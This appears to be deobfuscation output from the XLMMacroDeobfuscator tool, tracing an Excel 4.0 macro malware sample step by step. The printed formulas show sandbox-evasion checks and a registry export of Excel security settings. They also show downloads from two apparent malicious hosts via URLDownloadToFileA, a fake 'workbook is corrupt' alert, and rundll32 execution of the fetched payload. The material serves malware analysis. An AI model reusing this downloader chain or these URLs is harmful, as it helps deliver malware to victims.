Created
May 23, 2020 17:39
xlmdeobfuscator output 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60
| > xlmdeobfuscator --file 797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60 | |
| _ _______ | |
| |\ /|( \ ( ) | |
| ( \ / )| ( | () () | | |
| \ (_) / | | | || || | | |
| ) _ ( | | | |(_)| | | |
| / ( ) \ | | | | | | | |
| ( / \ )| (____/\| ) ( | | |
| |/ \|(_______/|/ \| | |
| ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______ | |
| ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ ) | |
| | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )| | |
| | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)| | |
| | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __) | |
| | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ ( | |
| | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__ | |
| (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/ | |
| XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator | |
| File: C:\temp\malware\cyc\797f6a24e9b1f8ac860f10ae665a277b622c8223842d9e57f31cad9141e19e60 | |
| [Loading Cells] | |
| auto_open: auto_openm6afs->'2vLFRsHXxIjyPtUuRJoWEsPvOjANfK'!$HU$50951 | |
| [Starting Deobfuscation] | |
| CELL:HU50951 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GA40879) | |
| CELL:HU50952 , FullEvaluation , GOTO(AL36930) | |
| CELL:AL36930 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GN25340) | |
| CELL:AL36931 , FullEvaluation , GOTO(GH16310) | |
| CELL:GH16310 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CT57368) | |
| CELL:GH16311 , FullEvaluation , GOTO(EB17524) | |
| CELL:EB17524 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DW61044) | |
| CELL:EB17525 , FullEvaluation , GOTO(DG45133) | |
| CELL:DG45133 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CV37983) | |
| CELL:DG45134 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!O26939) | |
| CELL:O26939 , FullEvaluation , FORMULA("=CLOSE(FALSE)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EW37000) | |
| CELL:O26940 , FullEvaluation , GOTO(CE63797) | |
| CELL:CE63797 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CE63798) | |
| CELL:CE63798 , NotImplemented , APP.MAXIMIZE() | |
| CELL:CE63799 , FullEvaluation , GOTO(BM18091) | |
| CELL:BM18091 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[18908]C[88]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BM18092) | |
| CELL:BM18092 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[18908]C[88]),) | |
| CELL:BM18093 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CQ50642) | |
| CELL:CQ50642 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-13643]C[58]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CQ50643) | |
| CELL:CQ50643 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-13643]C[58])) | |
| CELL:CQ50644 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EI11181) | |
| CELL:EI11181 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[25818]C[14]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EI11182) | |
| CELL:EI11182 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[25818]C[14]),) | |
| CELL:EI11183 , FullEvaluation , GOTO(L1180) | |
| CELL:L1180 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[35819]C[141]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!L1181) | |
| CELL:L1181 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[35819]C[141]),) | |
| CELL:L1182 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EU13046) | |
| CELL:EU13046 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[23953]C[2]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EU13047) | |
| CELL:EU13047 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[23953]C[2]),) | |
| CELL:EU13047 , FullEvaluation , [TRUE] GOTO(R[23953]C[2]) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:EU13047 , FullEvaluation , [FALSE] | |
| CELL:EU13048 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!R21769) | |
| CELL:R21769 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[15230]C[135]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!R21770) | |
| CELL:R21770 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[15230]C[135]),) | |
| CELL:R21770 , FullEvaluation , [TRUE] GOTO(R[15230]C[135]) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:R21770 , FullEvaluation , [FALSE] | |
| CELL:R21771 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DR14081) | |
| CELL:DR14081 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[22918]C[31]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DR14082) | |
| CELL:DR14082 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[22918]C[31])) | |
| CELL:DR14083 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AX32544) | |
| CELL:AX32544 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[4455]C[103]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AX32545) | |
| CELL:AX32545 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[4455]C[103])) | |
| CELL:AX32546 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!ID61803) | |
| CELL:ID61803 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-24804]C[-85]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!ID61804) | |
| CELL:ID61804 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-24804]C[-85])) | |
| CELL:ID61805 , FullEvaluation , GOTO(GN22239) | |
| CELL:GN22239 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CF64196) | |
| CELL:GN22240 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HR37672) | |
| CELL:HR37672 , FullEvaluation , FORMULA("=""C:\Users\Public\MRWk5IO.reg""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!L49932) | |
| CELL:HR37673 , FullEvaluation , GOTO(T8669) | |
| CELL:T8669 , FullEvaluation , FORMULA("=R[21768]C[-1]&GET.WORKSPACE(2)&""\Excel\Security ""&R[7504]C[-73]&"" /y""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CG42428) | |
| CELL:T8670 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HF38945) | |
| CELL:HF38945 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!I10296) | |
| CELL:HF38946 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EH17436) | |
| CELL:EH17436 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-7141]C[-129],R[24991]C[-53],0,5)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EH17437) | |
| CELL:EH17437 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",GET.WORKSPACE(2)\Excel\Security /y,0,5) | |
| CELL:EH17438 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD482) | |
| CELL:DD482 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[49447]C[-96])))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD485) | |
| CELL:DD483 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD486) | |
| CELL:DD484 , FullEvaluation , FORMULA("=NEXT()",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DD487) | |
| CELL:DD485 , PartialEvaluation , WHILE("C:\Users\Public\MRWk5IO.reg") | |
| CELL:DD486 , PartialEvaluation , WAIT("NOW()+""00:00:01""") | |
| CELL:DD487 , PartialEvaluation , NEXT() | |
| CELL:DD488 , FullEvaluation , GOTO(V10277) | |
| CELL:V10277 , FullEvaluation , FORMULA("=FOPEN(R[39654]C[-10])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!V10278) | |
| CELL:V10278 , PartialEvaluation , FOPEN("C:\Users\Public\MRWk5IO.reg") | |
| CELL:V10279 , FullEvaluation , GOTO(IG12783) | |
| CELL:IG12783 , FullEvaluation , FORMULA("=FPOS(R[-2506]C[-219],215)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IG12784) | |
| CELL:IG12784 , PartialEvaluation , FPOS("C:\Users\Public\MRWk5IO.reg",215) | |
| CELL:IG12785 , FullEvaluation , GOTO(HI20632) | |
| CELL:HI20632 , FullEvaluation , FORMULA("=FREAD(R[-10355]C[-195],255)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HI20633) | |
| CELL:HI20633 , PartialEvaluation , FREAD("C:\Users\Public\MRWk5IO.reg",255) | |
| CELL:HI20634 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EK34461) | |
| CELL:EK34461 , FullEvaluation , FORMULA("=FCLOSE(R[-24184]C[-119])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EK34462) | |
| CELL:EK34462 , PartialEvaluation , FCLOSE("C:\Users\Public\MRWk5IO.reg") | |
| CELL:EK34463 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BA23558) | |
| CELL:BA23558 , FullEvaluation , FORMULA("=FILE.DELETE(R[26373]C[-41])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BA23559) | |
| CELL:BA23559 , NotImplemented , FILE.DELETE(R[26373]C[-41]) | |
| CELL:BA23560 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AK48096) | |
| CELL:AK48096 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-27464]C[180])),GOTO(R[-11097]C[116]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AK48097) | |
| CELL:AK48097 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-27464]C[180])),GOTO(R[-11097]C[116]),) | |
| CELL:AK48098 , FullEvaluation , GOTO(DX58006) | |
| CELL:DX58006 , FullEvaluation , FORMULA("=""C:\Users\Public\nBVi9h.html""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IN57112) | |
| CELL:DX58007 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AM7624) | |
| CELL:AM7624 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!M61772) | |
| CELL:AM7625 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HI19421) | |
| CELL:HI19421 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[42350]C[-204],R[37690]C[31],0,0)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HI19422) | |
| CELL:HI19422 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\nBVi9h.html",0,0) | |
| CELL:HI19423 , FullEvaluation , GOTO(AG7500) | |
| CELL:AG7500 , FullEvaluation , FORMULA("=FILES(R[49611]C[215])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AG7501) | |
| CELL:AG7501 , PartialEvaluation , FILES("C:\Users\Public\nBVi9h.html") | |
| CELL:AG7502 , FullEvaluation , GOTO(BU59145) | |
| CELL:BU59145 , FullEvaluation , FORMULA("=IF(ISERROR(R[-51645]C[-40]),GOTO(R[-22146]C[80]),)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BU59146) | |
| CELL:BU59146 , FullBranching , IF(ISERROR(R[-51645]C[-40]),GOTO(R[-22146]C[80]),) | |
| CELL:BU59146 , FullEvaluation , [TRUE] GOTO(R[-22146]C[80]) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:BU59146 , FullEvaluation , [FALSE] | |
| CELL:BU59147 , FullEvaluation , GOTO(CG59551) | |
| CELL:CG59551 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!FB9427) | |
| CELL:CG59552 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GM60336) | |
| CELL:GM60336 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GG59792) | |
| CELL:GM60337 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CJ30722) | |
| CELL:CJ30722 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!GE27770) | |
| CELL:CJ30723 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AX54045) | |
| CELL:AX54045 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EJ8650) | |
| CELL:AX54046 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CP22668) | |
| CELL:CP22668 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CG45801) | |
| CELL:CP22669 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DA23632) | |
| CELL:DA23632 , FullEvaluation , FORMULA("=""C:\Users\Public\pLQQJvxb.html""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!DK64014) | |
| CELL:DA23633 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!FC22672) | |
| CELL:FC22672 , FullEvaluation , FORMULA("=""http://9dani.com/wp-keys.php""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HA27745) | |
| CELL:FC22673 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HN18354) | |
| CELL:HN18354 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[13272]C[197],R[49541]C[103],0,0)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!L14473) | |
| CELL:HN18355 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CJ64159) | |
| CELL:CJ64159 , FullEvaluation , FORMULA("=FILES(R[28771]C[60])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BC35243) | |
| CELL:CJ64160 , FullEvaluation , GOTO(AL51508) | |
| CELL:AL51508 , FullEvaluation , FORMULA("=IF(ISERROR(R[34631]C[-79]),,RUN(R[45684]C[85]))",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!ED612) | |
| CELL:AL51509 , FullEvaluation , GOTO(BX11151) | |
| CELL:BX11151 , FullEvaluation , FORMULA("=""https://scsanwei.cn/wp-keys.php""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IF41817) | |
| CELL:BX11152 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BT27018) | |
| CELL:BT27018 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[40940]C[29],R[63137]C[-96],0,0)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HC877) | |
| CELL:BT27019 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!AP4260) | |
| CELL:AP4260 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BW16243) | |
| CELL:AP4261 , FullEvaluation , GOTO(DZ51806) | |
| CELL:DZ51806 , FullEvaluation , FORMULA("=ALERT(R[-30053]C[-144])",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HK46296) | |
| CELL:DZ51807 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!EJ23437) | |
| CELL:EJ23437 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HY9631) | |
| CELL:EJ23438 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!BO59864) | |
| CELL:BO59864 , FullEvaluation , FORMULA("=R[50536]C[25]&"",DllRegisterServer""",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!CL13478) | |
| CELL:BO59865 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IE5736) | |
| CELL:IE5736 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-52181]C[69],R[-48334]C[-74],0,5)",2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!FH61812) | |
| CELL:IE5737 , FullEvaluation , GOTO(L14473) | |
| CELL:L14473 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://9dani.com/wp-keys.php","C:\Users\Public\pLQQJvxb.html",0,0) | |
| CELL:L14474 , FullEvaluation , GOTO(BC35243) | |
| CELL:BC35243 , PartialEvaluation , FILES("C:\Users\Public\pLQQJvxb.html") | |
| CELL:BC35244 , FullEvaluation , GOTO(ED612) | |
| CELL:ED612 , FullBranching , IF(ISERROR(R[34631]C[-79]),,RUN(R[45684]C[85])) | |
| CELL:ED612 , FullEvaluation , [TRUE] | |
| CELL:ED613 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!IF41817) | |
| CELL:IF41817 , FullEvaluation , "https://scsanwei.cn/wp-keys.php" | |
| CELL:IF41818 , FullEvaluation , GOTO(HC877) | |
| CELL:HC877 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://scsanwei.cn/wp-keys.php","C:\Users\Public\pLQQJvxb.html",0,0) | |
| CELL:HC878 , FullEvaluation , GOTO(BW16243) | |
| CELL:BW16243 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt." | |
| CELL:BW16244 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HK46296) | |
| CELL:HK46296 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.") | |
| CELL:HK46297 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HY9631) | |
| CELL:HY9631 , FullEvaluation , "C:\Windows\system32\rundll32.exe" | |
| CELL:HY9632 , FullEvaluation , GOTO(CL13478) | |
| CELL:CL13478 , FullEvaluation , C:\Users\Public\pLQQJvxb.html,DllRegisterServer | |
| CELL:CL13479 , FullEvaluation , GOTO(FH61812) | |
| CELL:FH61812 , FullEvaluation , a CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\pLQQJvxb.html,DllRegisterServer",0,5) | |
| CELL:FH61813 , FullEvaluation , GOTO(EW37000) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| CELL:ED612 , FullEvaluation , [FALSE] RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HK46296) | |
| CELL:HK46296 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.") | |
| CELL:HK46297 , FullEvaluation , RUN(2vLFRsHXxIjyPtUuRJoWEsPvOjANfK!HY9631) | |
| CELL:HY9631 , FullEvaluation , "C:\Windows\system32\rundll32.exe" | |
| CELL:HY9632 , FullEvaluation , GOTO(CL13478) | |
| CELL:CL13478 , FullEvaluation , C:\Users\Public\pLQQJvxb.html,DllRegisterServer | |
| CELL:CL13479 , FullEvaluation , GOTO(FH61812) | |
| CELL:FH61812 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\pLQQJvxb.html,DllRegisterServer",0,5) | |
| CELL:FH61813 , FullEvaluation , GOTO(EW37000) | |
| CELL:EW37000 , End , CLOSE(FALSE) | |
| [END of Deobfuscation] | |
| time elapsed: 73.34104084968567 |